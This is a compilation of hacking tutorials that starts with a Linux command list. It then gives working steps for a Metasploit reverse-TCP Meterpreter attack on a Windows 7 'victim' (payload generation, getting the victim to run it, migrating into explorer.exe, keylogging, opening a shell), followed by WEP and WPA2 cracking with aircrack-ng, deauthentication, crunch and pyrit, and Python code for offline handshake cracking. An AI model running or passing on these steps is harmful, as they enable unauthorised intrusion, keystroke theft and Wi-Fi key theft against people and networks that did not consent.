crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts
D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage
E
echo Display message on screen
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions
F
false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file
G
gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groupadd Add a user security group
groupdel Delete a group
groupmod Modify a group
groups Print group names a user is in
gzip Compress or decompress named file(s)
H
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command
history Command History
hostname Print or set system name
I
iconv Convert the character set of a file
id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
J
jobs List active jobs
join Join lines on a common field
K
kill Stop a process from running
killall Kill processes by name
L
less Display output one screen at a time
let Perform arithmetic on shell variables
ln Create a symbolic link to a file
local Create variables
locate Find files
logname Print current login name
logout Exit a login shell
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files
M
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create a hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mtr Network diagnostics (traceroute/ping)
mv Move or rename files or directories
mmv Mass Move and rename (files)
N
netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
notify-send Send desktop notifications
nslookup Query Internet name servers interactively
O
open Open a file in its default application
op Operator access
P
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory
Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
R
ram ram disk device
rcp Copy files between two machines
read Read a line from standard input
readarray Read from stdin into an array variable
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)
S
screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
seq Print numeric sequences
set Manipulate shell variables and functions
sftp Secure File Transfer Program
shift Shift positional parameters
shopt Shell Options
shutdown Shutdown or restart linux
sleep Delay for a specified time
slocate Find files
sort Sort text files
source Run commands from a file `.'
split Split a file into fixed-size pieces
ssh Secure Shell client (remote login program)
strace Trace system calls and signals
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file
suspend Suspend execution of this shell
symlink Make a new name for a file
sync Synchronize data on disk with memory
T
tail Output the last part of file
tar Tape ARchiver
tee Redirect output to multiple files
test Evaluate a conditional expression
time Measure Program running time
times User and system times
touch Change file timestamps
top List processes running on the system
traceroute Trace Route to Host
trap Run a command when a signal is set(bourne)
tr Translate, squeeze, and/or delete characters
true Do nothing, successfully
tsort Topological sort
tty Print filename of terminal on stdin
type Describe a command
U
ulimit Limit user resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
unshar Unpack shell archive scripts
until Execute commands (until error)
uptime Show uptime
useradd Create new user account
userdel Delete a user account
usermod Modify user account
users List users currently logged in
uuencode Encode a binary file
uudecode Decode a file created by uuencode
V
v Verbosely list directory contents (`ls -l -b')
vdir Verbosely list directory contents (`ls -l -b')
vi Text Editor
vmstat Report virtual memory statistics
W
wait Wait for a process to complete
watch Execute/display a program periodically
wc Print byte, word, and line counts
whereis Search the user's $path, man pages and source files for a program
which Search the user's $path for a program file
while Execute commands
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')
wget Retrieve web pages or files via HTTP, HTTPS or FTP
write Send a message to another user
X
xargs Execute utility, passing constructed argument list(s)
xdg-open Open a file or URL in the user's preferred application.
Y
yes Print a string until interrupted
. Run a command script in the current shell
!! Run the last command again

EXPLOITING WINDOWS 7 REMOTE COMPUTER USING METASPLOIT
FRAMEWORK
This section shows how to get a Meterpreter session on a Windows 7 machine by having it run a reverse-TCP executable that connects back to you. The steps are as follows. First, boot BackTrack 5 and type startx to start the GUI:
root@bt:~# startx
The default username and password are root and toor.
(Skip this first step if you are using Kali Linux.)

To find your local IP address, open a Konsole (bottom left of the taskbar) and type:
root@bt:~# ifconfig












Launch msfconsole by going to Applications >> BackTrack >> Exploitation Tools >> Network Exploitation Tools >> Metasploit Framework >> msfconsole, or just open a new terminal, type msfconsole and press Enter.

Wait a minute; msfconsole takes some time to load.

Let's now create an executable which, when run on the victim, connects back to us and gives us a Meterpreter session. Open another terminal and type:
root@bt:~# cd /opt/framework3/msf3
root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno X > /root/reverse_tcp.exe
LHOST is the local IP you noted earlier and LPORT can be any free port (the listener below uses 4444). The X option tells msfpayload to emit a Windows executable.
The generated file is /root/reverse_tcp.exe; it lands in root's home directory, not on the desktop.
Note: msfpayload and msfencode were removed from Metasploit in 2015. On a current Kali install the equivalent command is:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o /root/reverse_tcp.exe

Now comes the most important step: however you manage it (physical access to the machine, persuading the victim to run it, bundling it into an archive, etc.), the generated executable has to be run on the victim's PC. Nothing below works until it is.

Now switch to the first terminal, the one running msfconsole:
msf >
Type the following:
msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
LPORT => 4444

The listener is now configured. LHOST and LPORT must match the values baked into reverse_tcp.exe, because that is the address the executable will try to reach. The last step is to type exploit and press Enter; the handler then waits for the connection:
msf exploit(handler) > exploit

Once the executable runs on the victim you would see a Meterpreter prompt:
meterpreter >
Type ps to list the active processes:
meterpreter > ps
Find explorer.exe in the list and migrate into it (the PID differs on every machine; 2028 is the one from this session). Migrating moves the session out of the short-lived reverse_tcp.exe process, so it survives if that process is closed, and puts it in the user's desktop session, which the keylogger below needs:

meterpreter > migrate 2028
[*] Migrating to 2028
[*] Migration completed successfully.
meterpreter >

Then load the privilege extension:
meterpreter > use priv
(Current Meterpreter builds load priv automatically, so this may report that it is already loaded.)


Now, if you want to start logging the victim's keystrokes, just type keyscan_start.

If you want a command prompt on the victim's computer, just type shell:
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You now have a Windows command prompt. Type whoami to see the computer name and the user account the session is running as (COMPUTERNAME\username):
C:\Windows\system32>whoami
whoami
kyrion-pc\kyrion
C:\Windows\system32>




Let's say the victim has typed something in the meantime. Type exit to leave the Windows shell and return to Meterpreter, then type keyscan_dump to see the captured keystrokes:
meterpreter > keyscan_dump
Dumping captured keystrokes

That is it: you have a remote session on the Windows 7 machine.
Here is a video tutorial of the same: http://adfoc.us/10187334395259












SOCIAL ENGINEERING TOOLKIT
What is social engineering?
Social engineering means exploiting people rather than software: gaining someone's trust (or impersonating something they already trust) and using it to get them to do your work for you, such as typing their password into a page you control or opening a file you sent. Attackers use it constantly, because it is often easier than finding a technical vulnerability, and the benefit can be anything from a social-media username and password to accounts that are resold, for instance for paid Facebook likes.

The Social-Engineer Toolkit (SET) is the part of the penetration-testing platform that automates these attacks against people. The attack vectors it offers are listed below:
Spear-Phishing Attack Vector
Java Applet Attack Vector
Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web Jacking Attack Method
Multi-Attack Web Vector
Infectious Media Generator
Teensy USB HID Attack Vector
Website: http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)

A well maintained and fully updated official website by TrustedSec is always there for you, so I am not posting much about it here ;-)




CRACK WI-FI PASSWORDS USING BACKTRACK OR KALI LINUX
Yes, it is possible to recover the key of a Wi-Fi network with freely available tools.
Things we need:
A Wi-Fi card capable of monitor mode and packet injection; this is the biggest requirement. Chances are the one built into your computer is not. A list of compatible cards is here: http://madwifi-project.org/wiki/Compatibility

BackTrack or Kali, either installed or running live.
Note: a virtual machine cannot use the host's built-in wireless card, so this tutorial will not work from VMware unless you pass a supported USB adapter through to the guest. Otherwise boot BackTrack from a USB stick or use a dedicated machine.
A WEP- or WPA/WPA2-PSK-secured Wi-Fi network in range.
Some patience with the command line.

CRACKING WEP PASSWORD

This post will show you how easily WEP keys can be cracked.
Security Issues with WEP
WEP (Wired Equivalent Privacy) was shown to be badly flawed back in 2001, and the protocol itself is weak enough that an attacker can recover the key in minutes. The original WEP key is only 40 bits (the "64-bit" figure counts the IV), but the bigger flaw is the 24-bit initialisation vector (IV) that is prepended to the key for every packet and sent in the clear. There are only 2^24, about 16.7 million, possible IVs, so on a busy network the same RC4 keystream is reused within hours, and the way the IV is combined with the key lets statistical attacks (FMS, KoreK and PTW, which aircrack-ng implements) recover the key itself from a few tens of thousands of captured packets. A 40-bit key would otherwise need about 2^40 (1.1 trillion) guesses to brute-force, so the IV is what makes WEP cheap to break.

For more information on WEP flaws, kindly read the WEP flaws section here.
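As an added illustration (example code written for this edit, not part of the original post or of the aircrack-ng project), the following Python reproduces the IV problem with a textbook RC4 and a made-up 40-bit key: two frames encrypted under the same IV leak each other's plaintext, and the birthday bound shows how few frames a randomly chosen IV survives. It does not implement aircrack-ng's statistical key recovery (FMS/KoreK/PTW); it shows the keystream-reuse property those attacks build on. The key, IV and frame contents are constructed values, not captured traffic.

```python
# Added example (not from the original page): why WEP's 24-bit IV is the real weakness.
import math
import zlib

IV_BITS = 24                  # the WEP IV is 24 bits and travels in the clear
IV_SPACE = 1 << IV_BITS       # 16,777,216 possible IVs, the "16 million" figure


def rc4(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA then PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (clear) || RC4(IV || key) XOR (plaintext || CRC-32 ICV).
    A 40-bit key is 5 bytes, so the per-packet RC4 key is only 8 bytes long."""
    assert len(iv) == 3
    body = plaintext + zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4(iv + wep_key, len(body))
    return iv + bytes(p ^ k for p, k in zip(body, keystream))


def recover_via_iv_reuse(frame_known: bytes, known_plaintext: bytes, frame_unknown: bytes) -> bytes:
    """Two frames sent under the same IV share a keystream, so C1 XOR C2 = P1 XOR P2.
    Knowing P1 (e.g. a predictable LLC/ARP header) yields P2 without ever knowing the key."""
    assert frame_known[:3] == frame_unknown[:3], "IVs differ, so no keystream reuse"
    keystream = bytes(c ^ p for c, p in zip(frame_known[3:], known_plaintext))
    return bytes(c ^ k for c, k in zip(frame_unknown[3:], keystream))


def frames_until_iv_repeat(probability: float, iv_space: int = IV_SPACE) -> int:
    """Birthday bound: frames needed before some IV repeats with the given probability,
    for drivers that pick IVs at random (sequential drivers simply wrap after iv_space)."""
    return math.ceil(math.sqrt(2 * iv_space * math.log(1 / (1 - probability))))


# Constructed sample values (hypothetical key and frames, not captured traffic)
WEP_KEY = bytes.fromhex("0102030405")                             # 40-bit key
REUSED_IV = bytes.fromhex("0a0b0c")
KNOWN_PLAINTEXT = bytes.fromhex("aaaa0300000008060001080006040001")  # LLC/SNAP + ARP request header
SECRET_PLAINTEXT = b"secret frame 1"


def demo_iv_reuse() -> bytes:
    """Encrypt a known and an unknown frame under the same IV, then recover the unknown one."""
    frame1 = wep_encrypt(WEP_KEY, REUSED_IV, KNOWN_PLAINTEXT)
    frame2 = wep_encrypt(WEP_KEY, REUSED_IV, SECRET_PLAINTEXT)
    return recover_via_iv_reuse(frame1, KNOWN_PLAINTEXT, frame2)[:len(SECRET_PLAINTEXT)]
```

frames_until_iv_repeat(0.5) comes out at a few thousand frames, which is why the ARP replay in the procedure below produces usable collisions within minutes; the ICV is a plain CRC-32, so it adds no protection against this kind of manipulation either.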
Requirements:
Here is what you need to crack a WEP key:

1. BackTrack or any other Linux distro with aircrack-ng installed

2. A Wi-Fi adapter capable of injecting packets. For this tutorial I will use the Alfa AWUS036H, a very popular card that performs well with BackTrack.

You can find compatible Wi-Fi card lists here.
Procedure:
First log in to your BackTrack / Linux distro and plug in your Wi-Fi adapter. Open a new Konsole and type the following command:
ifconfig wlan0 up

Here wlan0 is the name of the wireless card; it can be different on your system. To see all wireless cards connected to your system simply type iwconfig.

Putting your Wi-Fi adapter in monitor mode
To begin, you need to put your wireless adapter into monitor mode. Monitor mode is the mode in which your card listens to every packet in the air rather than only the ones addressed to it. Put the card into monitor mode by typing the following command:

airmon-ng start (your interface)

Example: airmon-ng start wlan0

A new interface, mon0, is created. You can verify that it is in monitor mode by entering iwconfig mon0 as shown. If airmon-ng warns about interfering processes (NetworkManager, wpa_supplicant), run airmon-ng check kill first. Newer releases of aircrack-ng name the monitor interface wlan0mon instead of mon0; substitute that name in all the commands below.



Finding a suitable target

After putting your card into monitor mode, we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command:

airodump-ng mon0

BSSID shows the MAC address of the AP, CH shows the channel the AP is broadcasting on, ESSID shows the name broadcast by the AP, and the ENC and CIPHER columns show the encryption type (look for WEP).

Now look for a WEP-protected network; in my case I will take Linksys as my target for the rest of the tutorial.
Attacking the target
Now, to crack the WEP key you have to capture the target's data into a file. To do this we use airodump-ng again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection; otherwise the wireless card has to hop between all channels and misses most of the traffic. You can restrict the capture by giving the following command:

airodump-ng --bssid (bssid of the target) -c (channel) -w (file name to save) mon0

As my target is broadcasting on channel 6 and has the BSSID 98:fc:11:c9:14:22, I give the following command and save the captured data as "RHAWEP":

airodump-ng --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP mon0
Using aireplay-ng to speed up the cracking
You have to capture at least 20,000 data packets (unique IVs) to crack a 64-bit WEP key; 128-bit keys need roughly twice as many or more. This can be done in two ways. The first is a passive attack: wait for a client to connect to the AP and capture its data packets. This is very slow; it can take days or even weeks to collect that many packets.

The second method is an active attack, which is fast and takes only minutes to generate and inject that many packets.

In an active attack you first do a fake authentication (associate) with the AP, then generate and inject packets. Start with the fake authentication (-1 is fake authentication; the 3 is the delay in seconds between re-associations):
aireplay-ng -1 3 -a (bssid of the target) (interface)



In my case I enter: aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0
(If the AP rejects the association, add -h with the MAC address of your own card.)
After a successful fake authentication it is time to generate and inject ARP packets. To do this, open a new Konsole alongside the running capture and type the following (the -h MAC must be the one you authenticated with):
aireplay-ng -3 -b (bssid of target) -h (MAC address of mon0) (interface)



In my case I enter: aireplay-ng -3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was successful you will see the #Data column in the airodump-ng window climbing rapidly, as shown.

Wait till it reaches 20,000 packets; best would be to wait till it reaches around 80,000
to 90,000 packets. It is simple: the more packets, the less time to crack. Once you have captured enough packets, stop the aireplay-ng and airodump-ng processes with Ctrl+C in their terminals.

Cracking the WEP key using aircrack-ng

Now it is time to crack the WEP key from the captured data. Enter the following command in a new Konsole:

aircrack-ng (name of the capture file). In my case I enter aircrack-ng RHAWEP-01.cap (airodump-ng appends -01 to the name you gave it). Within a few minutes aircrack-ng will recover the WEP key as shown.

Once the crack is successful you will be left with the KEY! Remove the colons from the output and you have your WEP key, which any client accepts in hex form.





CRACKING WPA2-PSK ENCRYPTION
Cracking WPA/WPA2 is different from cracking WEP: there is no shortcut like WEP's IV weakness. Instead you capture the 4-way handshake between a client and the AP, which contains a message integrity code derived from the pre-shared key, and then run a dictionary (or brute-force) attack against it offline, trying candidate passphrases until one reproduces that code. In this tutorial I will show you how to run that attack.
For this tutorial I have used BackTrack 5 R3, and the Wi-Fi network is also set up by me, so I have full authorisation to attack it.
Step 1: airmon-ng

The result will be something like:
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2:
airmon-ng start wlan0

Step 3 (Optional):
Change the MAC address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4:
airodump-ng mon0

Then press Ctrl+C to stop it once you have noted the target's BSSID, channel and an associated client (STATION).
Step 5:

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
-w is the file to write
--bssid is the BSSID of the target AP (ff:ff:ff:ff:ff:ff is a placeholder; substitute the real one)
--ivs writes a compact .ivs file instead of a full pcap; omit it if you want a .cap for pyrit or Wireshark, as in the CUDA steps below
Leave this terminal running.

Step 6:
Open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -0 1 sends one deauthentication frame
-a is the BSSID
-c is the client MAC address (STATION)
The deauthenticated client reconnects and performs a fresh 4-way handshake, which airodump-ng captures. Wait until "WPA handshake: <bssid>" appears in the top right corner of the airodump-ng window.
Step 7:
Use the wordlist shipped with John the Ripper to crack the WPA/WPA2 passphrase:
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional):
If you do not want to use the John the Ripper wordlist, you can generate candidates on the fly with Crunch.
Go to the official site of crunch:
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing):
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 to 16 characters, and -w - tells aircrack-ng to read candidates from standard input.
Caveat: this keyspace is hopeless in practice. With a 95-character set, the 8-character candidates alone number 95^8 (about 6.6 x 10^15); at the roughly 17,500 PMKs per second quoted below for a GPU that is about 12,000 years, and every extra character multiplies it by 95. Crunch is only useful when you can narrow the pattern (known length, known prefix, restricted character set); otherwise stick to wordlists.
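Steps 5 to 8 describe what aircrack-ng does with the handshake without showing it. The following Python, added for this edit and not part of the original page or of aircrack-ng or pyrit, implements the same offline attack from the 802.11 standard: PBKDF2 (4096 rounds of HMAC-SHA1) turns each candidate passphrase into a PMK, the PRF expands it to the PTK, and the first 16 bytes of that (the KCK) are used to recompute the MIC of handshake message 2, which is compared with the sniffed one. The handshake it attacks is constructed inside the block from a made-up passphrase, SSID, MACs and nonces; the only real-world value is the IEEE 802.11i Annex H test vector used to check the PMK derivation. keyspace_years() is the arithmetic behind the crunch caveat above.

```python
# Added example (not from the original page): the offline dictionary attack that
# aircrack-ng -w and pyrit attack_passthrough run against a captured 4-way handshake.
import hashlib
import hmac
from typing import Iterable, Optional

PBKDF2_ROUNDS = 4096   # fixed by the WPA standard; the reason speed is quoted in PMKs per second


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11 PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min(MAC)||max(MAC)||min(nonce)||max(nonce)).
    CCMP uses 48 bytes, TKIP 64; the KCK (first 16 bytes) that signs the handshake is the same."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(hs: dict, candidates: Iterable[str]) -> Optional[str]:
    """For each candidate: passphrase -> PMK -> PTK -> KCK -> MIC, compared with the sniffed MIC."""
    for candidate in candidates:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        ptk = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), hs["mic"]):
            return candidate
    return None


def keyspace_years(charset_size: int, min_len: int, max_len: int, pmk_per_second: float) -> float:
    """How long an exhaustive crunch-style search of all lengths takes at a given PMK rate."""
    total = sum(charset_size ** n for n in range(min_len, max_len + 1))
    return total / pmk_per_second / (365.25 * 24 * 3600)


# --- Constructed sample handshake (hypothetical network, not a real capture) ---
SSID = "RHAWPA"
AP_MAC = bytes.fromhex("98fc11c91422")
CLIENT_MAC = bytes.fromhex("00c0ca50f832")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 layout: version, type, length, descriptor, key info, key length,
# replay counter, SNonce, key IV, RSC, key ID, MIC (zeroed for the calculation), key-data length
EAPOL_M2 = (bytes.fromhex("0203007502010a00100000000000000001")
            + SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
SECRET_PASSPHRASE = "correct horse battery"   # known to the client, not to the attacker


def sniffed_handshake() -> dict:
    """Plays the client's role in message 2 and returns only what a sniffer would see."""
    ptk = derive_ptk(pmk_from_passphrase(SECRET_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap_mac": AP_MAC, "client_mac": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_M2, "mic": eapol_mic(ptk[:16], EAPOL_M2)}
```

Everything the attacker needs (SSID, both MACs, both nonces, the EAPOL frame and its MIC) is in the clear in the capture; the only secret is the passphrase, and the 4096 PBKDF2 rounds are the sole thing slowing each guess down, which is why GPU tools and precomputed PMK tables exist for this step.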
Using an nVidia card with CUDA (pyrit)
If you have an nVidia card with CUDA, you can use pyrit to crack the passphrase on the GPU, again feeding it candidates from crunch.
Step a:
airmon-ng

The result will be something like:
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]
Step b:
airmon-ng start wlan0
Step c (Optional):
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d:
airodump-ng mon0

Then press Ctrl+C to stop it once you have the target's details.
Step e:
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
(no --ivs this time: pyrit needs the full .cap)
Step f:
Open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g:
If the following packages are not yet installed, install them:
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h:
Go to the official site of crunch:
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing):
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i:
Go to the official site of pyrit:
http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Note: Google Code has since closed and pyrit is no longer maintained. The current GPU tool for this job is hashcat (modes 2500 and 22000 for WPA/WPA2 handshakes); the workflow of piping candidates into it is the same.

Step j:
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 to 16 characters, and -i - reads candidates from standard input.
Step k (Optional):
If you encounter an error when reading wpacrack-01.cap, strip it down to the handshake first:
pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 to 16 characters.
Step l:
You will then see something similar to the following:

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks:
With an nVidia GeForce GTX 460 (336 CUDA cores) the cracking speed is about 17,000 PMKs (candidate passphrases) per second. The PBKDF2 step that turns each passphrase into a PMK takes 4096 SHA-1 rounds, which is what keeps this number so low compared with plain hash cracking.
To test whether your wireless card (USB or PCI-e) can inject:
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit works on your system:
pyrit list_cores



METASPLOIT TUTORIAL BY SHAHAB IMAM
Metasploit is a framework for exploiting vulnerabilities, most often in network services listening on an open port. It is an extremely powerful tool and not an easy one to master. Many speak of vulnerabilities without defining them first, so:
What is a vulnerability?
A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. Not all vulnerabilities are dangerous and not all of them are exploitable. They are often found in outdated applications, services or operating systems. Now that we understand what being exploitable means, what is an exploit itself?
What are exploits?
Exploits are small, highly specialised programs whose only purpose is to take advantage of a vulnerability and deliver a payload, which is what actually gives the attacker control. Metasploit ships a vast number of exploits, and I will cover using some of them later on. So, if an exploit's purpose is to deliver a payload, what is a payload?
Buffer Overflow
Buffer overflow is the most common class of bug behind memory-corruption exploits. How does it work? Imagine a glass of water: you keep pouring, and at some point the glass is full and the water spills onto your carpet. A program does the same thing when it writes more data into a fixed-size buffer than the buffer can hold. The excess spills into adjacent memory and overwrites whatever was there, such as a saved return address, and by controlling what gets overwritten the attacker redirects execution into code of their own. That is how the malicious part of an exploit gets to run.
What is a payload?
A payload is delivered by the exploit and is used to control the remote system. Think of it this way: the exploit is the courier who gets past the door, and the payload is the package he leaves inside. The most popular and widely known payload is Meterpreter, which has a lot of features: with it you can browse remote files, download them, upload your own, capture keystrokes, take screenshots, open a command shell, and pivot to other machines, attacking systems in networks you could not reach directly.
The first step to success is a small one. You cannot learn without studying. That is why you have to get your hands dirty and start searching. But before that, let's talk a little about Metasploit.
Metasploit
Metasploit and all of its modules are written in Ruby. Metasploit has had four interfaces:
msfcli
msfconsole
msfgui
Armitage
(msfcli and msfgui have since been removed from the framework; msfconsole and Armitage remain.) I will go into detail about msfconsole and Armitage. You can run Metasploit on both Windows and Linux.
Windows: 95% among you out there use it.. -_-
Use BackTrack: BackTrack is a Linux distribution made entirely for pentesting purposes. It has a vast number of amazing tools that you will be using, and Metasploit is one of them.
Information Gathering
Exploitation
Executable Payload
MeterPreter
DNS Spoofing
Sniffing
Armitage
Now we come to the first part of learning to use Metasploit like a pro:
